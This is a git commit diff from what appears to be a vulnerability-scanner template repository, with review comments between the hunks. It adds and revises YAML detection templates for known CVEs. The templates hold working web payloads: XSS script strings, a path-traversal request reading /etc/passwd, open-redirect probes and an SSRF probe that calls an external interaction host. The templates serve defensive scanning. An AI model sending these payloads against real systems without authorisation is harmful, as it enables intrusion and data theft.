Merge remote-tracking branch 'upstream/master'

patch-1
GwanYeong Kim 2022-02-03 18:01:45 +09:00
commit 009bccc5f2
151 changed files with 4535 additions and 2926 deletions

@ -0,0 +1,30 @@
name: 📑 Template-DB Indexer
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
index:
runs-on: ubuntu-latest
steps:
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Intalling Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git
cd nucleish-api/cmd/generate-index/
go install
- name: Generate Index
env:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates
generate-index -mode changelog
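Review bot: the step name on the `Intalling Indexer` line is misspelled (`Installing Indexer`), and the `git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github` rewrite stores the token in the runner's global git config for every URL that begins with `https://github`; narrowing the pattern to the one organisation that needs it (`https://github.com/projectdiscovery/`) and using a token scoped to read-only access on `nucleish-api` limits what any later step in the job can do with it. There is also no `actions/checkout` step before `generate-index -mode templates`, so unless the indexer fetches the template tree itself, the job runs against an empty workspace; worth confirming or adding the checkout.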

@ -7,10 +7,9 @@
# tags is a list of tags to ignore execution for
# unless asked for by the user.
tags:
tags:
- "fuzz"
- "dos"
- "misc"
# files is a list of files to ignore template execution
# unless asked for by the user.

@ -60,7 +60,7 @@ git add .
git commit -m "Added/Fixed/Updated XXX Template"
```
**NOTE**:
**NOTE**:
- A Pull Request should have only one unique template to make it simple for review.
- Multiple templates for same technology can be grouped into single Pull Request.

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
**203 directories, 3004 files**.
**212 directories, 3054 files**.
</td>
</tr>

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |

@ -4,9 +4,14 @@ info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd,cnvd2019
remediation: There is currently no patch available.
classification:
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 6.5
cwe-id: CWE-276
requests:
- method: GET
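Review bot: the new `cvss-metrics` vector (`AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`) does not agree with the description a few lines above it: an attacker who can reinstall the system through the installation page affects integrity as well as availability, and the installation page is reached over the network, not from an adjacent network. Either the vector or the description should change, and since `cvss-score: 6.5` follows from the vector, recheck it against the CNVD entry given under `reference`.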
@ -27,3 +32,5 @@ requests:
- "/view/js/xiuno.js"
- "Choose Language (选择语言)"
condition: and
# Enhanced by mp on 2022/01/26

@ -643,7 +643,7 @@
"author": "forgedhallpass",
"links": {
"github": "https://www.github.com/forgedhallpass",
"twitter": "",
"twitter": "https://twitter.com/forgedhallpass",
"linkedin": "",
"website": "",
"email": ""

@ -5,10 +5,13 @@ info:
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
remediation: Upgrade to the latest version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
tags: cve,cve2000,frontpage,microsoft
classification:
cve-id: CVE-2000-0114
requests:
- method: GET
@ -24,4 +27,7 @@ requests:
- type: word
part: body
words:
- "_vti_bin/shtml.dll"
- "_vti_bin/shtml.dll"
# Enhanced by mp on 2022/01/27

@ -4,9 +4,14 @@ info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
reference: https://www.exploit-db.com/exploits/24068
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
remediation: Upgrade to the latest version.
reference:
- https://www.exploit-db.com/exploits/24068
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
tags: xss,squirrelmail,cve2004,cve
classification:
cve-id: CVE-2004-0519
requests:
- method: GET
@ -28,3 +33,7 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/01/27
# Enhanced by mp on 2022/01/27

@ -4,11 +4,14 @@ info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
remediation: Upgrade to the latest version.
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
classification:
cve-id: CVE-2008-6172
requests:
- method: GET
@ -25,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/01/27

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
- "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
matchers-condition: and
matchers:

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
- "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and
matchers:
@ -34,4 +34,4 @@ requests:
- type: status
status:
- 200
- 200

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/swipehqpaymentgatewaywoocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
matchers-condition: and
matchers:
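Review bot: the corrected path on the `swipehq-payment-gateway-woocommerce` line still ends with a space before the closing quote (`%3C/script%3E "`), carried over from the old line; that space becomes part of the request path, so the request may not reach the handler it targets. Drop the trailing space while the slug is being fixed.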

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ultimateweatherplugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpplanet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
@ -34,4 +34,4 @@ requests:
- type: status
status:
- 200
- 200

@ -5,16 +5,19 @@ info:
author: dhiyaneshDK
severity: high
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
remediation: Upgrade to a supported version of Gog.
reference:
- http://www.securityfocus.com/bid/71187
- http://seclists.org/fulldisclosure/2014/Nov/33
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
- http://gogs.io/docs/intro/change_log.html
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
- http://www.exploit-db.com/exploits/35238
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
- http://www.securityfocus.com/archive/1/533995/100/0/threaded
tags: cve,cve2014,sqli,gogs
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2014-8682
cwe-id: CWE-89
metadata:
shodan-query: 'title:"Sign In - Gogs"'
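Review bot: `remediation: Upgrade to a supported version of Gog.` misspells the product name; it should read `Gogs`. The fixed version is already named in the description (0.5.6.1105), so `Upgrade to Gogs 0.5.6.1105 or later.` would tell the reader more than the generic phrasing.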
@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/01

@ -30,3 +30,4 @@ requests:
- type: status
status:
- 200
- 500

@ -0,0 +1,27 @@
id: CVE-2016-3978
info:
name: FortiOS (Fortinet) - Open Redirect and XSS
author: 0x_Akoko
severity: medium
description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
reference:
- https://seclists.org/fulldisclosure/2016/Mar/68
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
tags: cve,cve2016,redirect,fortinet,fortios
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-3978
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/login?redir=http://www.example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
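Review bot: the description says the redirect is triggered via the `"redirect"` parameter to `login`, but the request sends `?redir=`; one of the two is wrong and should be checked against the fulldisclosure reference before this ships. Also, `cwe-id: CWE-79` covers only the XSS half of the name, while the other open-redirect templates added in this commit use `CWE-601`, and `tags` carries `redirect` but no `xss` even though the name advertises both.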

@ -3,7 +3,7 @@ info:
author: Random_Robbie
name: Apache Struts2 RCE
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce,apache
reference: https://github.com/mazen160/struts-pwn
classification:
@ -25,4 +25,4 @@ requests:
- type: word
words:
- "X-Hacker: Bounty Plz"
part: header
part: header

@ -1,7 +1,7 @@
id: CVE-2017-7391
info:
name: Magmi Cross-Site Scripting v.0.7.22
name: Magmi Cross-Site Scripting v.0.7.22
author: pikpikcu
severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
@ -25,12 +25,13 @@ requests:
- type: status
status:
- 200
- type: word
words:
- '"><script>alert(document.domain);</script><'
part: body
- type: word
part: body
words:
- '"><script>alert(document.domain);</script><'
- type: word
part: header
words:
- "text/html"
part: header

@ -4,7 +4,7 @@ info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter.
reference:
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247

@ -4,7 +4,7 @@ info:
name: D-Link Routers - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
reference:
- https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822

@ -10,7 +10,7 @@ info:
caused by improper neutralization of special elements.
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack.
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce,spring
classification:
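Review bot: the apostrophe fix on the `Spring Data's` line leaves the original typo in place: `request payload binding hat can lead to` should read `that can lead to`. Worth fixing in the same pass.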

@ -2,34 +2,38 @@ id: CVE-2018-13380
info:
name: Fortinet FortiOS Cross-Site Scripting
author: shelld3v
author: shelld3v,AaronChen0
severity: medium
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
tags: cve,cve2018,fortios,xss,fortinet
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-13380
cwe-id: CWE-79
tags: cve,cve2018,fortios,xss,fortinet
requests:
- method: GET
path:
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(1337)>"
part: body
- "<script>alert(1337)</script>"
condition: or
- type: word
part: header
words:
- "application/json"
part: header
negative: true
- type: status

@ -1,7 +1,7 @@
id: CVE-2018-17254
info:
name: Joomla JCK Editor SQL Injection
name: Joomla! JCK Editor SQL Injection
author: Suman_Kar
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
severity: critical
@ -27,3 +27,5 @@ requests:
part: body
words:
- "nuclei-template"
# Enhanced by cs on 2022/02/01

@ -0,0 +1,49 @@
id: CVE-2019-13396
info:
name: FlightPath Local File Inclusion
author: 0x_Akoko,daffainfo
severity: high
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
reference:
- https://www.exploit-db.com/exploits/47121
- https://www.cvedetails.com/cve/CVE-2019-13396/
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-13396
cwe-id: CWE-22
tags: cve,cve2019,flightpath,lfi
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: regex
name: token
part: body
group: 1
internal: true
regex:
- "idden' name='form_token' value='([a-z0-9]+)'>"
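Review bot: the two raw requests disagree on the application root: the first fetches `/login` while the second posts to `/flightpath/index.php`. If FlightPath lives under `/flightpath/`, the first request never returns the login form, the `token` extractor finds nothing, and the POST goes out with an empty `form_token`; the two paths should share one prefix. Separately, `severity: high` does not agree with the `cvss-score: 5.3` vector (`C:L/I:N/A:N`), which maps to medium; pick one.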

@ -31,3 +31,4 @@ requests:
- type: status
status:
- 200
- 500

@ -0,0 +1,38 @@
id: CVE-2020-18268
info:
name: Z-BlogPHP 1.5.2 Open redirect
author: 0x_Akoko
severity: medium
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
reference:
- https://github.com/zblogcn/zblogphp/issues/216
- https://www.cvedetails.com/cve/CVE-2020-18268
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-18268
cwe-id: CWE-601
tags: cve,cve2020,redirect,zblogphp,authenticated
requests:
- raw:
- |
POST /zb_system/cmd.php?act=verify HTTP/1.1
Host: {{Hostname}}
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
Connection: close
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- |
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
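Review bot: `Content-Length: 81` is hard-coded in the first raw request while the body length depends on `{{username}}` and the MD5 of `{{password}}`, so the header is wrong for any credentials other than the ones it was computed for; remove it so the length is derived from the actual body. In the second request, `atc=login` looks like a typo for `act=login` (the first request uses `act=verify`), and its request line says `HTTP/2` while the first says `HTTP/1.1`; the two should be consistent.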

@ -4,7 +4,7 @@ info:
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
author: Ganofins
severity: critical
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server.
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
tags: cve,cve2020,wordpress,wp-plugin,rce,upload
classification:

@ -29,9 +29,9 @@ requests:
- "Contact Form 7"
part: body
- type: regex
regex:
- '^== Changelog =="'
- type: word
words:
- '== Changelog =='
part: body
- type: regex

@ -0,0 +1,31 @@
id: CVE-2020-36365
info:
name: Smartstore < 4.1.0 - Open redirect
author: 0x_Akoko
severity: medium
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
reference:
- https://github.com/smartstore/SmartStoreNET/issues/2113
- https://www.cvedetails.com/cve/CVE-2020-36365
- https://github.com/smartstore/SmartStoreNET
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-36365
cwe-id: CWE-601
metadata:
shodan-query: http.html:'content="Smartstore'
tags: cve,cve2020,redirect,smartstore
requests:
- method: GET
path:
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
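Review bot: the description lists four affected actions (`ClearCache`, `ClearDatabaseCache`, `RestartApplication`, `ScheduleTaskController.Edit`) but the template probes only `clearcache`, which is enough for detection; a short comment saying this is deliberate would stop a later contributor from adding `RestartApplication` as a second path, since that action has side effects on the target well beyond a redirect check.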

@ -4,7 +4,7 @@ info:
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
author: gy741
severity: high
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
reference:
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
tags: cve,cve2020,cacti,rce,oast

@ -0,0 +1,38 @@
id: CVE-2021-21973
info:
name: VMware vCenter Unauthenticated SSRF
author: pdteam
severity: medium
description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-21973
- https://twitter.com/osama_hroot/status/1365586206982082560
- https://twitter.com/bytehx343/status/1486582542807420928
tags: cve,cve2021,vmware,ssrf,vcenter,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-21973
cwe-id: CWE-918
requests:
- raw:
- |
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
Host: {{Hostname}}
Vcip: {{interactsh-url}}
Vcpassword: {{rand_base(6)}}
Vcusername: {{rand_base(6)}}
Reqresource: {{rand_base(6)}}
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: body
words:
- "The server sent HTTP status code 200"
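Review bot: the template carries the `oast` tag and places `{{interactsh-url}}` in `Vcip`, but the matchers only check for status 500 and the body string `The server sent HTTP status code 200`; there is no `interactsh_protocol` matcher, so a finding depends entirely on the target's error text rather than on the out-of-band callback actually arriving. Adding a matcher on the interactsh interaction (or a comment explaining why the body string alone is reliable) would make the result robust to differing error messages.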

@ -0,0 +1,32 @@
id: CVE-2021-24838
info:
name: AnyComment <= 0.2.21 - Open Redirect
author: noobexploiter
severity: medium
description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
reference:
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
tags: wordpress,wp-plugin,open-redirect
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24838
cwe-id: CWE-601
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:
- 302
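Review bot: `tags: wordpress,wp-plugin,open-redirect` lacks the `cve` and `cve2021` tags that every other CVE template in this commit carries, and uses `open-redirect` where the other redirect templates here use `redirect`, so tag-based runs such as `-tags cve` will skip it. Use `cve,cve2021,wordpress,wp-plugin,redirect`.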

@ -0,0 +1,34 @@
id: CVE-2021-25864
info:
name: Hue Magic - Directory Traversal
author: 0x_Akoko
severity: high
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
reference:
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
- https://www.cvedetails.com/cve/CVE-2021-25864
metadata:
shodan-query: title:"NODE-RED"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-25864
cwe-id: CWE-22
tags: cve,cve2021,huemagic,lfi
requests:
- method: GET
path:
